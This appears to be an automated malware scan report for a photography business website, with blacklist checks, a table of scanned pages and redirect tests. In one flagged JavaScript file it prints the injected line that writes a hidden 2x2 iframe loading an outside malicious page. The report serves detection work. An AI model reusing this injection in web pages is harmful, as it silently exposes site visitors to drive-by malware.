Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=twcphotography.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://twcphotography.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://twcphotography.com/ | 200 OK Content-Length: 3236 Content-Type: text/html | clean |
http://twcphotography.com/index.html | 200 OK Content-Length: 3236 Content-Type: text/html | clean |
http://twcphotography.com/ABOUT.html | 200 OK Content-Length: 3348 Content-Type: text/html | clean |
http://twcphotography.com/GALLERIES.html | 200 OK Content-Length: 6215 Content-Type: text/html | clean |
http://twcphotography.com/PACKAGES.html | 200 OK Content-Length: 4234 Content-Type: text/html | clean |
http://twcphotography.com/CONTACT.html | 200 OK Content-Length: 3642 Content-Type: text/html | clean |
http://twcphotography.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://twcphotography.com/Price List.pdf | 200 OK Content-Length: 300970 Content-Type: application/pdf | clean |
http://twcphotography.com/WEDDINGS.html | 200 OK Content-Length: 4578 Content-Type: text/html | clean |
http://twcphotography.com/Scripts/swfobject_modified.js | 200 OK Content-Length: 21861 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://forums.smartlanka.net/eems.html?j=1198854></iframe>');
var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Flash", SHOCKWAVE_FLASH_AX = "ShockwaveFlash.ShockwaveFlash", FLASH_MIME_TYPE = "application/x-shockwave-flash", EXPRESS_INSTALL_ID = "SWFObjectExprInst", win var obj = getElementById(EXPRESS_INSTALL_ID); if (obj) { obj.parentNode.replaceChild(storedAltContent, obj); if (storedAltContentId) { setVisibility(storedAltContentId, true); if (ua.ie && ua.win) { storedAltContent.style.display = "block"; } } storedAltContent = null; storedAltContentId = null; isExpressInstallActive = false; } } } }; }(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://forums.smartlanka.net/eems.html?j=1198854 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://forums.smartlanka.net/eems.html?j=1198854> | ||
http://twcphotography.com/INDEX.html | 404 Not Found Content-Length: 327 Content-Type: text/html | clean |
http://twcphotography.com/BRIDALS.html | 200 OK Content-Length: 3421 Content-Type: text/html | clean |
http://twcphotography.com/ENGAGEMENTS.html | 200 OK Content-Length: 4688 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: twcphotography.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:03:30 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 3236
Content-Type: text/html
Last-Modified: Sun, 08 Dec 2013 20:43:26 GMT
...3236 bytes of data.
GET / HTTP/1.1
Host: twcphotography.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:03:30 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 3236
Content-Type: text/html
Last-Modified: Sun, 08 Dec 2013 20:43:26 GMT
...3236 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: twcphotography.com
Referer: http://www.google.com/search?q=twcphotography.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: twcphotography.com
Referer: http://www.google.com/search?q=twcphotography.com
Result:
The result is similar to the first query. There are no suspicious redirects found.